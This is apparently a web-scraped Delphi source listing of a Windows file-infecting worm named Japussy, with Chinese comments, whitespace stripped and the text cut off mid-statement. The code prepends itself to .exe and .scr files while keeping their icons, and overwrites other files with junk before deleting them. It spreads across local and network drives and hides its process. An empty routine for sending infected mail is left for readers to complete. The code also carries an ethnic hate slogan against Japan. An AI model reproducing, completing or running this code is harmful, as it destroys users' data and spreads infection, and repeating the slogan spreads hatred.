搜索
programjapussy;useswindows,sysutils,classes,graphics,shellapi{,registry};constheadersize=82432;//病毒体的大小iconoffset=$12eb8;//pe文件主图标的偏移量//在我的delphi5sp1上面编译得到的大小,其它版本的delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量{headersize=38912;//upx压缩过病毒体的大小iconoffset=$92bc;//upx压缩过pe文件主图标的偏移量//upx1.24w用法:upx-9--8086japussy.exe}iconsize=$2e8;//pe文件主图标的大小--744字节icontail=iconoffset+iconsize;//pe文件主图标的尾部id=$44444444;//感染标记//垃圾码,以备写入catchword='ifaraceneedtobekilledout,itmustbeyamato.'+'ifacountryneedtobedestroyed,itmustbejapan!'+'***w32.japussy.worm.a***';{$r*.res}functionregisterserviceprocess(dwprocessid,dwtype:integer):integer;stdcall;external'kernel32.dll';//函数声明vartmpfile:string;si:startupinfo;pi:process_information;isjap:boolean=false;//日文操作系统标记{判断是否为win9x}functioniswin9x:boolean;varver:tosversioninfo;beginresult:=false;ver.dwosversioninfosize:=sizeof(tosversioninfo);ifnotgetversionex(ver)thenexit;if(ver.dwplatformid=ver_platform_win32_windows)then//win9xresult:=true;end;{在流之间复制}procedurecopystream(src:tstream;sstartpos:integer;dst:tstream;dstartpos:integer;count:integer);varscurpos,dcurpos:integer;beginscurpos:=src.position;dcurpos:=dst.position;src.seek(sstartpos,0);dst.seek(dstartpos,0);dst.copyfrom(src,count);src.seek(scurpos,0);dst.seek(dcurpos,0);end;{将宿主文件从已感染的pe文件中分离出来,以备使用}procedureextractfile(filename:string);varsstream,dstream:tfilestream;begintrysstream:=tfilestream.create(paramstr(0),fmopenreadOrfmsharedenynone);trydstream:=tfilestream.create(filename,fmcreate);trysstream.seek(headersize,0);//跳过头部的病毒部分dstream.copyfrom(sstream,sstream.size-headersize);finallydstream.free;end;finallysstream.free;end;exceptend;end;{填充startupinfo结构}procedurefillstartupinfo(varsi:startupinfo;state:word);beginsi.cb:=sizeof(si);si.lpreserved:=nil;si.lpdesktop:=nil;si.lptitle:=nil;si.dwflags:=startf_useshowwindow;si.wshowwindow:=state;si.cbreserved2:=0;si.lpreserved2:=nil;end;{发带毒邮件}proceduresendmail;begin//哪位仁兄愿意完成之?end;{感染pe文件}procedureinfectonefile(filename:string);varhdrstream,srcstream:tfilestream;icostream,dststream:tmemorystream;iid:longint;aicon:ticon;infected,ispe:boolean;i:integer;buf:array[0..1]ofchar;begintry//出错则文件正在被使用,退出ifcomparetext(filename,'japussy.exe')=0then//是自己则不感染exit;infected:=false;ispe:=false;srcstream:=tfilestream.create(filename,fmopenread);tryfori:=0to$108do//检查pe文件头beginsrcstream.seek(i,sofrombeginning);srcstream.read(buf,2);if(buf[0]=#80)And(buf[1]=#69)then//pe标记beginispe:=true;//是pe文件break;end;end;srcstream.seek(-4,sofromend);//检查感染标记srcstream.read(iid,4);if(iid=id)Or(srcstream.size10240)then//太小的文件不感染infected:=true;finallysrcstream.free;end;ifinfectedOr(notispe)then//如果感染过了或不是pe文件则退出exit;icostream:=tmemorystream.create;dststream:=tmemorystream.create;tryaicon:=ticon.create;try//得到被感染文件的主图标(744字节),存入流aicon.releasehandle;aicon.handle:=extracticon(hinstance,pchar(filename),0);aicon.savetostream(icostream);finallyaicon.free;end;srcstream:=tfilestream.create(filename,fmopenread);//头文件hdrstream:=tfilestream.create(paramstr(0),fmopenreadOrfmsharedenynone);try//写入病毒体主图标之前的数据copystream(hdrstream,0,dststream,0,iconoffset);//写入目前程序的主图标copystream(icostream,22,dststream,iconoffset,iconsize);//写入病毒体主图标到病毒体尾部之间的数据copystream(hdrstream,icontail,dststream,icontail,headersize-icontail);//写入宿主程序copystream(srcstream,0,dststream,headersize,srcstream.size);//写入已感染的标记dststream.seek(0,2);iid:=$44444444;dststream.write(iid,4);finallyhdrstream.free;end;finallysrcstream.free;icostream.free;dststream.savetofile(filename);//替换宿主文件dststream.free;end;except;end;end;{将目标文件写入垃圾码后删除}proceduresmashfile(filename:string);varfilehandle:integer;i,size,mass,max,len:integer;begintrysetfileattributes(pchar(filename),0);//去掉只读属性filehandle:=fileopen(filename,fmopenwrite);//打开文件trysize:=getfilesize(filehandle,nil);//文件大小i:=0;randomize;max:=random(15);//写入垃圾码的随机次数ifmax5thenmax:=5;mass:=sizedivmax;//每个间隔块的大小len:=length(catchword);whileimaxdobeginfileseek(filehandle,i*mass,0);//定位//写入垃圾码,将文件彻底破坏掉filewrite(filehandle,catchword,len);inc(i);end;finallyfileclose(filehandle);//关闭文件end;deletefile(pchar(filename));//删除之exceptend;end;{获得可写的驱动器列表}functiongetdrives:string;vardisktype:word;d:char;str:string;i:integer;beginfori:=0to25do//遍历26个字母begind:=chr(i+65);str:=d+':\';disktype:=getdrivetype(pchar(str));//得到本地磁盘和网络盘if(disktype=drive_fixed)Or(disktype=drive_remote)thenresult:=result+d;end;end;{遍历目录,感染和摧毁文件}procedureloopfiles(path,mask:string);vari,count:integer;fn,ext:string;subdir:tstrings;searchrec:tsearchrec;msg:tmsg;functionisvaliddir(searchrec:tsearchrec):integer;beginif(searchrec.attr16)And(searchrec.name'.')and(searchrec.name'..')thenresult:=0//不是目录elseif(searchrec.attr=16)And(searchrec.name'.')and(searchrec.name'..')thenresult:=1//不是根目录elseresult:=2;//是根目录end;beginif(findfirst(path+mask,faanyfile,searchrec)=0)thenbeginrepeatpeekmessage(msg,0,0,0,pm_remove);//调整消息队列,避免引起怀疑ifisvaliddir(searchrec)=0thenbeginfn:=path+searchrec.name;ext:=uppercase(extractfileext(fn));if(ext='.exe')Or(ext='.scr')thenbegininfectonefile(fn);//感染可执行文件endelseif(ext